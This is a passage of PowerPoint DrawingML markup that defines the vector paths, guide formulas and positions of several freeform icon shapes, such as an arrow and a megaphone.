                      <a:pt x="42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3" name="Freeform 59">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CD9422D-8CB3-472E-909A-CBD2F21EE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2076" y="3920155"/>
                <a:ext cx="236837" cy="238794"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 61 w 121"/>
                  <a:gd name="T1" fmla="*/ 122 h 122"/>
                  <a:gd name="T2" fmla="*/ 121 w 121"/>
                  <a:gd name="T3" fmla="*/ 62 h 122"/>
                  <a:gd name="T4" fmla="*/ 84 w 121"/>
                  <a:gd name="T5" fmla="*/ 62 h 122"/>
                  <a:gd name="T6" fmla="*/ 84 w 121"/>
                  <a:gd name="T7" fmla="*/ 0 h 122"/>
                  <a:gd name="T8" fmla="*/ 38 w 121"/>
                  <a:gd name="T9" fmla="*/ 0 h 122"/>
                  <a:gd name="T10" fmla="*/ 38 w 121"/>
                  <a:gd name="T11" fmla="*/ 62 h 122"/>
                  <a:gd name="T12" fmla="*/ 0 w 121"/>
                  <a:gd name="T13" fmla="*/ 62 h 122"/>
                  <a:gd name="T14" fmla="*/ 61 w 121"/>
                  <a:gd name="T15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" h="122">
                    <a:moveTo>
                      <a:pt x="61" y="122"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="121" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61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4" name="Freeform 60">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6660AB10-E038-48B1-BF9B-B06B3E2DE2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48058" y="3391677"/>
                <a:ext cx="197691" cy="19769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57 w 62"/>
                  <a:gd name="T11" fmla="*/ 35 h 62"/>
                  <a:gd name="T12" fmla="*/ 41 w 62"/>
                  <a:gd name="T13" fmla="*/ 34 h 62"/>
                  <a:gd name="T14" fmla="*/ 46 w 62"/>
                  <a:gd name="T15" fmla="*/ 53 h 62"/>
                  <a:gd name="T16" fmla="*/ 57 w 62"/>
                  <a:gd name="T17" fmla="*/ 35 h 62"/>
                  <a:gd name="T18" fmla="*/ 41 w 62"/>
                  <a:gd name="T19" fmla="*/ 55 h 62"/>
                  <a:gd name="T20" fmla="*/ 36 w 62"/>
                  <a:gd name="T21" fmla="*/ 35 h 62"/>
                  <a:gd name="T22" fmla="*/ 35 w 62"/>
                  <a:gd name="T23" fmla="*/ 35 h 62"/>
                  <a:gd name="T24" fmla="*/ 15 w 62"/>
                  <a:gd name="T25" fmla="*/ 52 h 62"/>
                  <a:gd name="T26" fmla="*/ 31 w 62"/>
                  <a:gd name="T27" fmla="*/ 57 h 62"/>
                  <a:gd name="T28" fmla="*/ 41 w 62"/>
                  <a:gd name="T29" fmla="*/ 55 h 62"/>
                  <a:gd name="T30" fmla="*/ 11 w 62"/>
                  <a:gd name="T31" fmla="*/ 48 h 62"/>
                  <a:gd name="T32" fmla="*/ 33 w 62"/>
                  <a:gd name="T33" fmla="*/ 31 h 62"/>
                  <a:gd name="T34" fmla="*/ 34 w 62"/>
                  <a:gd name="T35" fmla="*/ 31 h 62"/>
                  <a:gd name="T36" fmla="*/ 32 w 62"/>
                  <a:gd name="T37" fmla="*/ 26 h 62"/>
                  <a:gd name="T38" fmla="*/ 4 w 62"/>
                  <a:gd name="T39" fmla="*/ 30 h 62"/>
                  <a:gd name="T40" fmla="*/ 4 w 62"/>
                  <a:gd name="T41" fmla="*/ 31 h 62"/>
                  <a:gd name="T42" fmla="*/ 11 w 62"/>
                  <a:gd name="T43" fmla="*/ 48 h 62"/>
                  <a:gd name="T44" fmla="*/ 5 w 62"/>
                  <a:gd name="T45" fmla="*/ 25 h 62"/>
                  <a:gd name="T46" fmla="*/ 29 w 62"/>
                  <a:gd name="T47" fmla="*/ 22 h 62"/>
                  <a:gd name="T48" fmla="*/ 20 w 62"/>
                  <a:gd name="T49" fmla="*/ 7 h 62"/>
                  <a:gd name="T50" fmla="*/ 5 w 62"/>
                  <a:gd name="T51" fmla="*/ 25 h 62"/>
                  <a:gd name="T52" fmla="*/ 25 w 62"/>
                  <a:gd name="T53" fmla="*/ 5 h 62"/>
                  <a:gd name="T54" fmla="*/ 35 w 62"/>
                  <a:gd name="T55" fmla="*/ 20 h 62"/>
                  <a:gd name="T56" fmla="*/ 49 w 62"/>
                  <a:gd name="T57" fmla="*/ 11 h 62"/>
                  <a:gd name="T58" fmla="*/ 31 w 62"/>
                  <a:gd name="T59" fmla="*/ 4 h 62"/>
                  <a:gd name="T60" fmla="*/ 25 w 62"/>
                  <a:gd name="T61" fmla="*/ 5 h 62"/>
                  <a:gd name="T62" fmla="*/ 51 w 62"/>
                  <a:gd name="T63" fmla="*/ 14 h 62"/>
                  <a:gd name="T64" fmla="*/ 37 w 62"/>
                  <a:gd name="T65" fmla="*/ 24 h 62"/>
                  <a:gd name="T66" fmla="*/ 38 w 62"/>
                  <a:gd name="T67" fmla="*/ 28 h 62"/>
                  <a:gd name="T68" fmla="*/ 39 w 62"/>
                  <a:gd name="T69" fmla="*/ 30 h 62"/>
                  <a:gd name="T70" fmla="*/ 57 w 62"/>
                  <a:gd name="T71" fmla="*/ 30 h 62"/>
                  <a:gd name="T72" fmla="*/ 51 w 62"/>
                  <a:gd name="T73" fmla="*/ 1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57" y="35"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="56" y="35"/>
                      <a:pt x="49" y="32"/>
                      <a:pt x="41" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="43"/>
                      <a:pt x="45" y="51"/>
                      <a:pt x="46" y="53"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="49"/>
                      <a:pt x="56" y="42"/>
                      <a:pt x="57" y="35"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="41" y="55"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="53"/>
                      <a:pt x="39" y="45"/>
                      <a:pt x="36" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="36" y="35"/>
                      <a:pt x="36" y="35"/>
                      <a:pt x="35" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="20" y="40"/>
                      <a:pt x="15" y="51"/>
                      <a:pt x="15" y="52"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="55"/>
                      <a:pt x="25" y="57"/>
                      <a:pt x="31" y="57"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="35" y="57"/>
                      <a:pt x="38" y="57"/>
                      <a:pt x="41" y="55"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="11" y="48"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="47"/>
                      <a:pt x="19" y="35"/>
                      <a:pt x="33" y="31"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="33" y="31"/>
                      <a:pt x="33" y="31"/>
                      <a:pt x="34" y="31"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="33" y="29"/>
                      <a:pt x="32" y="28"/>
                      <a:pt x="32" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="18" y="30"/>
                      <a:pt x="6" y="30"/>
                      <a:pt x="4" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="30"/>
                      <a:pt x="4" y="30"/>
                      <a:pt x="4" y="31"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="38"/>
                      <a:pt x="7" y="44"/>
                      <a:pt x="11" y="48"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="5" y="25"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="25"/>
                      <a:pt x="17" y="25"/>
                      <a:pt x="29" y="22"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="14"/>
                      <a:pt x="20" y="8"/>
                      <a:pt x="20" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="10"/>
                      <a:pt x="7" y="17"/>
                      <a:pt x="5" y="25"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="25" y="5"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="6"/>
                      <a:pt x="30" y="12"/>
                      <a:pt x="35" y="20"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="17"/>
                      <a:pt x="48" y="12"/>
                      <a:pt x="49" y="11"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="7"/>
                      <a:pt x="38" y="4"/>
                      <a:pt x="31" y="4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="29" y="4"/>
                      <a:pt x="27" y="4"/>
                      <a:pt x="25" y="5"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="51" y="14"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="51" y="15"/>
                      <a:pt x="46" y="20"/>
                      <a:pt x="37" y="24"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="26"/>
                      <a:pt x="38" y="27"/>
                      <a:pt x="38" y="28"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="39" y="29"/>
                      <a:pt x="39" y="29"/>
                      <a:pt x="39" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="48" y="29"/>
                      <a:pt x="57" y="30"/>
                      <a:pt x="57" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="57" y="24"/>
                      <a:pt x="55" y="18"/>
                      <a:pt x="5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5" name="Freeform 61">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A380E47-399D-498C-BE0D-4B3053CC69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50369" y="3689191"/>
                <a:ext cx="187904" cy="166372"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 48 w 59"/>
                  <a:gd name="T1" fmla="*/ 0 h 52"/>
                  <a:gd name="T2" fmla="*/ 11 w 59"/>
                  <a:gd name="T3" fmla="*/ 0 h 52"/>
                  <a:gd name="T4" fmla="*/ 0 w 59"/>
                  <a:gd name="T5" fmla="*/ 12 h 52"/>
                  <a:gd name="T6" fmla="*/ 0 w 59"/>
                  <a:gd name="T7" fmla="*/ 50 h 52"/>
                  <a:gd name="T8" fmla="*/ 2 w 59"/>
                  <a:gd name="T9" fmla="*/ 52 h 52"/>
                  <a:gd name="T10" fmla="*/ 57 w 59"/>
                  <a:gd name="T11" fmla="*/ 52 h 52"/>
                  <a:gd name="T12" fmla="*/ 59 w 59"/>
                  <a:gd name="T13" fmla="*/ 50 h 52"/>
                  <a:gd name="T14" fmla="*/ 59 w 59"/>
                  <a:gd name="T15" fmla="*/ 12 h 52"/>
                  <a:gd name="T16" fmla="*/ 48 w 59"/>
                  <a:gd name="T17" fmla="*/ 0 h 52"/>
                  <a:gd name="T18" fmla="*/ 37 w 59"/>
                  <a:gd name="T19" fmla="*/ 34 h 52"/>
                  <a:gd name="T20" fmla="*/ 37 w 59"/>
                  <a:gd name="T21" fmla="*/ 45 h 52"/>
                  <a:gd name="T22" fmla="*/ 22 w 59"/>
                  <a:gd name="T23" fmla="*/ 45 h 52"/>
                  <a:gd name="T24" fmla="*/ 22 w 59"/>
                  <a:gd name="T25" fmla="*/ 34 h 52"/>
                  <a:gd name="T26" fmla="*/ 11 w 59"/>
                  <a:gd name="T27" fmla="*/ 34 h 52"/>
                  <a:gd name="T28" fmla="*/ 29 w 59"/>
                  <a:gd name="T29" fmla="*/ 19 h 52"/>
                  <a:gd name="T30" fmla="*/ 48 w 59"/>
                  <a:gd name="T31" fmla="*/ 34 h 52"/>
                  <a:gd name="T32" fmla="*/ 37 w 59"/>
                  <a:gd name="T33" fmla="*/ 34 h 52"/>
                  <a:gd name="T34" fmla="*/ 9 w 59"/>
                  <a:gd name="T35" fmla="*/ 8 h 52"/>
                  <a:gd name="T36" fmla="*/ 12 w 59"/>
                  <a:gd name="T37" fmla="*/ 4 h 52"/>
                  <a:gd name="T38" fmla="*/ 46 w 59"/>
                  <a:gd name="T39" fmla="*/ 4 h 52"/>
                  <a:gd name="T40" fmla="*/ 50 w 59"/>
                  <a:gd name="T41" fmla="*/ 8 h 52"/>
                  <a:gd name="T42" fmla="*/ 9 w 59"/>
                  <a:gd name="T43" fmla="*/ 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9" h="52">
                    <a:moveTo>
                      <a:pt x="48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2"/>
                      <a:pt x="1" y="52"/>
                      <a:pt x="2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8" y="52"/>
                      <a:pt x="59" y="52"/>
                      <a:pt x="59" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="12"/>
                      <a:pt x="59" y="12"/>
                      <a:pt x="59" y="12"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="48" y="0"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="37" y="34"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="45"/>
                      <a:pt x="37" y="45"/>
                      <a:pt x="37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48" y="34"/>
                      <a:pt x="48" y="34"/>
                      <a:pt x="48" y="34"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="37" y="34"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="9" y="8"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="4"/>
                      <a:pt x="12" y="4"/>
                      <a:pt x="12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50" y="8"/>
                      <a:pt x="50" y="8"/>
                      <a:pt x="50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6" name="Freeform 62">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC50F27A-E6D2-4788-8790-56DF4E1F0F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43244" y="4012150"/>
                <a:ext cx="303387" cy="266197"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 95 w 95"/>
                  <a:gd name="T1" fmla="*/ 34 h 83"/>
                  <a:gd name="T2" fmla="*/ 83 w 95"/>
                  <a:gd name="T3" fmla="*/ 0 h 83"/>
                  <a:gd name="T4" fmla="*/ 83 w 95"/>
                  <a:gd name="T5" fmla="*/ 0 h 83"/>
                  <a:gd name="T6" fmla="*/ 75 w 95"/>
                  <a:gd name="T7" fmla="*/ 0 h 83"/>
                  <a:gd name="T8" fmla="*/ 31 w 95"/>
                  <a:gd name="T9" fmla="*/ 19 h 83"/>
                  <a:gd name="T10" fmla="*/ 30 w 95"/>
                  <a:gd name="T11" fmla="*/ 34 h 83"/>
                  <a:gd name="T12" fmla="*/ 31 w 95"/>
                  <a:gd name="T13" fmla="*/ 49 h 83"/>
                  <a:gd name="T14" fmla="*/ 75 w 95"/>
                  <a:gd name="T15" fmla="*/ 67 h 83"/>
                  <a:gd name="T16" fmla="*/ 83 w 95"/>
                  <a:gd name="T17" fmla="*/ 67 h 83"/>
                  <a:gd name="T18" fmla="*/ 83 w 95"/>
                  <a:gd name="T19" fmla="*/ 67 h 83"/>
                  <a:gd name="T20" fmla="*/ 95 w 95"/>
                  <a:gd name="T21" fmla="*/ 34 h 83"/>
                  <a:gd name="T22" fmla="*/ 80 w 95"/>
                  <a:gd name="T23" fmla="*/ 62 h 83"/>
                  <a:gd name="T24" fmla="*/ 78 w 95"/>
                  <a:gd name="T25" fmla="*/ 61 h 83"/>
                  <a:gd name="T26" fmla="*/ 75 w 95"/>
                  <a:gd name="T27" fmla="*/ 55 h 83"/>
                  <a:gd name="T28" fmla="*/ 71 w 95"/>
                  <a:gd name="T29" fmla="*/ 34 h 83"/>
                  <a:gd name="T30" fmla="*/ 75 w 95"/>
                  <a:gd name="T31" fmla="*/ 12 h 83"/>
                  <a:gd name="T32" fmla="*/ 78 w 95"/>
                  <a:gd name="T33" fmla="*/ 7 h 83"/>
                  <a:gd name="T34" fmla="*/ 80 w 95"/>
                  <a:gd name="T35" fmla="*/ 5 h 83"/>
                  <a:gd name="T36" fmla="*/ 82 w 95"/>
                  <a:gd name="T37" fmla="*/ 7 h 83"/>
                  <a:gd name="T38" fmla="*/ 86 w 95"/>
                  <a:gd name="T39" fmla="*/ 12 h 83"/>
                  <a:gd name="T40" fmla="*/ 89 w 95"/>
                  <a:gd name="T41" fmla="*/ 34 h 83"/>
                  <a:gd name="T42" fmla="*/ 86 w 95"/>
                  <a:gd name="T43" fmla="*/ 55 h 83"/>
                  <a:gd name="T44" fmla="*/ 82 w 95"/>
                  <a:gd name="T45" fmla="*/ 61 h 83"/>
                  <a:gd name="T46" fmla="*/ 80 w 95"/>
                  <a:gd name="T47" fmla="*/ 62 h 83"/>
                  <a:gd name="T48" fmla="*/ 23 w 95"/>
                  <a:gd name="T49" fmla="*/ 34 h 83"/>
                  <a:gd name="T50" fmla="*/ 24 w 95"/>
                  <a:gd name="T51" fmla="*/ 20 h 83"/>
                  <a:gd name="T52" fmla="*/ 12 w 95"/>
                  <a:gd name="T53" fmla="*/ 21 h 83"/>
                  <a:gd name="T54" fmla="*/ 5 w 95"/>
                  <a:gd name="T55" fmla="*/ 21 h 83"/>
                  <a:gd name="T56" fmla="*/ 0 w 95"/>
                  <a:gd name="T57" fmla="*/ 30 h 83"/>
                  <a:gd name="T58" fmla="*/ 0 w 95"/>
                  <a:gd name="T59" fmla="*/ 38 h 83"/>
                  <a:gd name="T60" fmla="*/ 5 w 95"/>
                  <a:gd name="T61" fmla="*/ 47 h 83"/>
                  <a:gd name="T62" fmla="*/ 12 w 95"/>
                  <a:gd name="T63" fmla="*/ 47 h 83"/>
                  <a:gd name="T64" fmla="*/ 24 w 95"/>
                  <a:gd name="T65" fmla="*/ 47 h 83"/>
                  <a:gd name="T66" fmla="*/ 23 w 95"/>
                  <a:gd name="T67" fmla="*/ 34 h 83"/>
                  <a:gd name="T68" fmla="*/ 34 w 95"/>
                  <a:gd name="T69" fmla="*/ 53 h 83"/>
                  <a:gd name="T70" fmla="*/ 22 w 95"/>
                  <a:gd name="T71" fmla="*/ 51 h 83"/>
                  <a:gd name="T72" fmla="*/ 30 w 95"/>
                  <a:gd name="T73" fmla="*/ 81 h 83"/>
                  <a:gd name="T74" fmla="*/ 33 w 95"/>
                  <a:gd name="T75" fmla="*/ 83 h 83"/>
                  <a:gd name="T76" fmla="*/ 44 w 95"/>
                  <a:gd name="T77" fmla="*/ 78 h 83"/>
                  <a:gd name="T78" fmla="*/ 46 w 95"/>
                  <a:gd name="T79" fmla="*/ 75 h 83"/>
                  <a:gd name="T80" fmla="*/ 34 w 95"/>
                  <a:gd name="T81" fmla="*/ 53 h 83"/>
                  <a:gd name="T82" fmla="*/ 80 w 95"/>
                  <a:gd name="T83" fmla="*/ 45 h 83"/>
                  <a:gd name="T84" fmla="*/ 79 w 95"/>
                  <a:gd name="T85" fmla="*/ 44 h 83"/>
                  <a:gd name="T86" fmla="*/ 78 w 95"/>
                  <a:gd name="T87" fmla="*/ 42 h 83"/>
                  <a:gd name="T88" fmla="*/ 77 w 95"/>
                  <a:gd name="T89" fmla="*/ 34 h 83"/>
                  <a:gd name="T90" fmla="*/ 78 w 95"/>
                  <a:gd name="T91" fmla="*/ 25 h 83"/>
                  <a:gd name="T92" fmla="*/ 79 w 95"/>
                  <a:gd name="T93" fmla="*/ 23 h 83"/>
                  <a:gd name="T94" fmla="*/ 80 w 95"/>
                  <a:gd name="T95" fmla="*/ 23 h 83"/>
                  <a:gd name="T96" fmla="*/ 81 w 95"/>
                  <a:gd name="T97" fmla="*/ 23 h 83"/>
                  <a:gd name="T98" fmla="*/ 82 w 95"/>
                  <a:gd name="T99" fmla="*/ 25 h 83"/>
                  <a:gd name="T100" fmla="*/ 84 w 95"/>
                  <a:gd name="T101" fmla="*/ 34 h 83"/>
                  <a:gd name="T102" fmla="*/ 82 w 95"/>
                  <a:gd name="T103" fmla="*/ 42 h 83"/>
                  <a:gd name="T104" fmla="*/ 81 w 95"/>
                  <a:gd name="T105" fmla="*/ 44 h 83"/>
                  <a:gd name="T106" fmla="*/ 80 w 95"/>
                  <a:gd name="T107" fmla="*/ 4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" h="83">
                    <a:moveTo>
                      <a:pt x="95" y="34"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="95" y="15"/>
                      <a:pt x="89" y="0"/>
                      <a:pt x="83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75" y="0"/>
                      <a:pt x="75" y="0"/>
                      <a:pt x="75" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="0"/>
                      <a:pt x="57" y="13"/>
                      <a:pt x="31" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="30" y="23"/>
                      <a:pt x="30" y="28"/>
                      <a:pt x="30" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="30" y="39"/>
                      <a:pt x="30" y="44"/>
                      <a:pt x="31" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="57" y="54"/>
                      <a:pt x="75" y="67"/>
                      <a:pt x="75" y="67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9" y="67"/>
                      <a:pt x="95" y="52"/>
                      <a:pt x="95" y="34"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="80" y="62"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="79" y="62"/>
                      <a:pt x="78" y="61"/>
                      <a:pt x="78" y="61"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="77" y="60"/>
                      <a:pt x="76" y="58"/>
                      <a:pt x="75" y="55"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="49"/>
                      <a:pt x="71" y="42"/>
                      <a:pt x="71" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="26"/>
                      <a:pt x="72" y="18"/>
                      <a:pt x="75" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="10"/>
                      <a:pt x="77" y="8"/>
                      <a:pt x="78" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="6"/>
                      <a:pt x="79" y="5"/>
                      <a:pt x="80" y="5"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="81" y="5"/>
                      <a:pt x="82" y="6"/>
                      <a:pt x="82" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="84" y="8"/>
                      <a:pt x="85" y="10"/>
                      <a:pt x="86" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="88" y="18"/>
                      <a:pt x="89" y="26"/>
                      <a:pt x="89" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="89" y="42"/>
                      <a:pt x="88" y="49"/>
                      <a:pt x="86" y="55"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="58"/>
                      <a:pt x="84" y="60"/>
                      <a:pt x="82" y="61"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="61"/>
                      <a:pt x="81" y="62"/>
                      <a:pt x="80" y="62"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="23" y="34"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="29"/>
                      <a:pt x="24" y="24"/>
                      <a:pt x="24" y="20"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="20" y="21"/>
                      <a:pt x="16" y="21"/>
                      <a:pt x="12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5" y="47"/>
                      <a:pt x="5" y="47"/>
                      <a:pt x="5" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="47"/>
                      <a:pt x="5" y="47"/>
                      <a:pt x="12" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16" y="47"/>
                      <a:pt x="20" y="47"/>
                      <a:pt x="24" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="43"/>
                      <a:pt x="23" y="39"/>
                      <a:pt x="23" y="34"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="34" y="53"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="51"/>
                      <a:pt x="22" y="51"/>
                      <a:pt x="22" y="5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2" y="83"/>
                      <a:pt x="33" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="78"/>
                      <a:pt x="44" y="78"/>
                      <a:pt x="44" y="78"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="78"/>
                      <a:pt x="46" y="76"/>
                      <a:pt x="46" y="75"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="34" y="53"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="80" y="45"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="80" y="45"/>
                      <a:pt x="79" y="44"/>
                      <a:pt x="79" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="79" y="44"/>
                      <a:pt x="78" y="43"/>
                      <a:pt x="78" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="77" y="40"/>
                      <a:pt x="77" y="37"/>
                      <a:pt x="77" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="77" y="31"/>
                      <a:pt x="77" y="28"/>
                      <a:pt x="78" y="25"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="25"/>
                      <a:pt x="79" y="24"/>
                      <a:pt x="79" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="79" y="23"/>
                      <a:pt x="80" y="23"/>
                      <a:pt x="80" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="80" y="23"/>
                      <a:pt x="81" y="23"/>
                      <a:pt x="81" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="81" y="24"/>
                      <a:pt x="82" y="25"/>
                      <a:pt x="82" y="25"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="83" y="28"/>
                      <a:pt x="84" y="31"/>
                      <a:pt x="84" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="84" y="37"/>
                      <a:pt x="83" y="40"/>
                      <a:pt x="82" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="43"/>
                      <a:pt x="81" y="44"/>
                      <a:pt x="81" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="81" y="44"/>
                      <a:pt x="80" y="45"/>
                      <a:pt x="8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7" name="Freeform 18">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31707D84-29D5-4ED1-8612-1A555D657C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767808" y="3599153"/>
                <a:ext cx="160501" cy="64591"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 50 w 50"/>
                  <a:gd name="T1" fmla="*/ 10 h 20"/>
                  <a:gd name="T2" fmla="*/ 50 w 50"/>
                  <a:gd name="T3" fmla="*/ 10 h 20"/>
                  <a:gd name="T4" fmla="*/ 40 w 50"/>
                  <a:gd name="T5" fmla="*/ 0 h 20"/>
                  <a:gd name="T6" fmla="*/ 28 w 50"/>
                  <a:gd name="T7" fmla="*/ 0 h 20"/>
                  <a:gd name="T8" fmla="*/ 18 w 50"/>
                  <a:gd name="T9" fmla="*/ 10 h 20"/>
                  <a:gd name="T10" fmla="*/ 18 w 50"/>
                  <a:gd name="T11" fmla="*/ 10 h 20"/>
                  <a:gd name="T12" fmla="*/ 18 w 50"/>
                  <a:gd name="T13" fmla="*/ 11 h 20"/>
                  <a:gd name="T14" fmla="*/ 23 w 50"/>
                  <a:gd name="T15" fmla="*/ 11 h 20"/>
                  <a:gd name="T16" fmla="*/ 23 w 50"/>
                  <a:gd name="T17" fmla="*/ 10 h 20"/>
                  <a:gd name="T18" fmla="*/ 23 w 50"/>
                  <a:gd name="T19" fmla="*/ 10 h 20"/>
